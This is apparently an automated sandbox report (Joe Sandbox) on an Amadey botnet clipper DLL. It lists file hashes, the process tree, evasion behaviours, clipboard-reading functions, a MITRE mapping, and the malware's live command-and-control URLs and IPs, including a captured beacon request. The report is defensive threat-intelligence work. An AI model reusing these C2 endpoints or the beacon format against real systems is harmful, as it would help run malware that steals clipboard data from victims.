Edit tour

Windows Analysis Report
D72j5I83wU.dll

Overview

General Information

Sample name:	D72j5I83wU.dll renamed because original name is a hash value
Original sample name:	c2f3fbbbe6d5f48a71b6b168b1485866.dll
Analysis ID:	1574266
MD5:	c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:	1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:	c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
Tags:	Amadeydlluser-abuse_ch
Infos:

Detection

Amadey

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

C2 URLs / IPs found in malware configuration

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7380 cmdline: loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7436 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7476 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7452 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7564 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7612 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7744 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7760 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
D72j5I83wU.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.rundll32.exe.6e4e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
7.2.rundll32.exe.6e4e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M7

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:48:45.709940+0100	2856151	1	A Network Trojan was detected	192.168.2.11	49716	185.81.68.148	80	TCP
2024-12-13T07:48:48.330355+0100	2856151	1	A Network Trojan was detected	192.168.2.11	49723	185.81.68.148	80	TCP

Code function: 7_2_6E4E1EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

7_2_6E4E1EC0

Source: unknown

HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpP
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpS
Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php_
Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpw
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php-
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpf
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br
Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php~
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4E31B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6E4E31B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4E31B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6E4E31B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4E31B0		7_2_6E4E31B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4F1AB1		7_2_6E4F1AB1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E4E73B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E4E5D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E4E6B05 appears 47 times

Source: D72j5I83wU.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal92.troj.spyw.evad.winDLL@18/0@0/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03

Source: D72j5I83wU.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z

Source: D72j5I83wU.dll

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: D72j5I83wU.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: D72j5I83wU.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 4181	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 5814	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 3627	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 6370	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616	Thread sleep count: 4181 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616	Thread sleep time: -4181000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616	Thread sleep count: 5814 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616	Thread sleep time: -5814000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764	Thread sleep count: 3627 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764	Thread sleep time: -3627000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764	Thread sleep count: 6370 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764	Thread sleep time: -6370000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4EBCEE FindFirstFileExW,

7_2_6E4EBCEE

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4E7288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6E4E7288

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4EA254 mov eax, dword ptr fs:[00000030h]		7_2_6E4EA254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4EB881 mov eax, dword ptr fs:[00000030h]		7_2_6E4EB881

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4ED218 GetProcessHeap,

7_2_6E4ED218

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4E7288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6E4E7288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4E6B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6E4E6B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6E4E9820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6E4E9820

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.147 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.148 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4E70A7 cpuid

7_2_6E4E70A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6E4E73F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_6E4E73F8

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: D72j5I83wU.dll, type: SAMPLE
Source: Yara match	File source: 11.2.rundll32.exe.6e4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.6e4e0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
D72j5I83wU.dll	47%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
http://185.81.68.147/7vhfjke3/index.php_	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpf	100%	Avira URL Cloud	phishing
http://185.81.68.148/Fvu5jh4DbS/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpw	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpS	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpP	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php~	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.php-	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/7vhfjke3/index.php	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/7vhfjke3/index.php_	rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpP	rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpS	rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpf	rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br	rundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpw	rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/Fvu5jh4DbS/index.php	rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php~	rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php-	rundll32.exe, 0000000B.00000002.3790521828.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.81.68.147	unknown	Finland		50108	KLNOPT-ASFI	true
185.81.68.148	unknown	Finland		50108	KLNOPT-ASFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574266
Start date and time:	2024-12-13 07:47:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	D72j5I83wU.dll renamed because original name is a hash value
Original Sample Name:	c2f3fbbbe6d5f48a71b6b168b1485866.dll
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winDLL@18/0@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: D72j5I83wU.dll

Simulations

Behavior and APIs

Time	Type	Description
01:48:44	API Interceptor	1x Sleep call for process: loaddll32.exe modified
01:49:17	API Interceptor	10555448x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.81.68.147	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php?wal=1
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php
